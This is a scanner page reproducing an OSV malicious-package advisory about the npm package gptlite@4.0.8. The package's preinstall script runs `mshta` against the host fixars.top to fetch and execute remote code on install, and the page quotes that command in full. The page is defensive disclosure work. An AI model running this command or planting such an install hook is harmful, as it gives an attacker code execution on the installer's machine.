OSV Malicious Advisory
scanned 5h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-10461 confirms this npm version as malicious. The package's npm preinstall lifecycle script (preinstall.js, referenced from package.json's "preinstall": "node preinstall.js") invokes child_process.exec with the command `cmd /c "mshta http://fixars.top"`. On Windows, mshta.exe fetches the remote HTML Application over plain HTTP from fixars.top and executes it as trusted code...
Advisory
MAL-2026-10461
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in gptlite (npm)
Details
The package's npm preinstall lifecycle script (preinstall.js, referenced from package.json's "preinstall": "node preinstall.js") invokes child_process.exec with the command `cmd /c "mshta http://fixars.top"`. On Windows, mshta.exe fetches the remote HTML Application over plain HTTP from fixars.top and executes it as trusted code. The fetch runs automatically on `npm install`, before any consumer code is reviewed, and delivers arbitrary attacker-controlled code execution on the installer's machine. The destination domain is unrelated to any documented package purpose and is served over unauthenticated HTTP, so the executed content is fully attacker-controlled and mutable.
Decision reason
OpenSSF Malicious Packages via OSV confirms gptlite@4.0.8 as malicious (MAL-2026-10461): Malicious code in gptlite (npm)
References
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory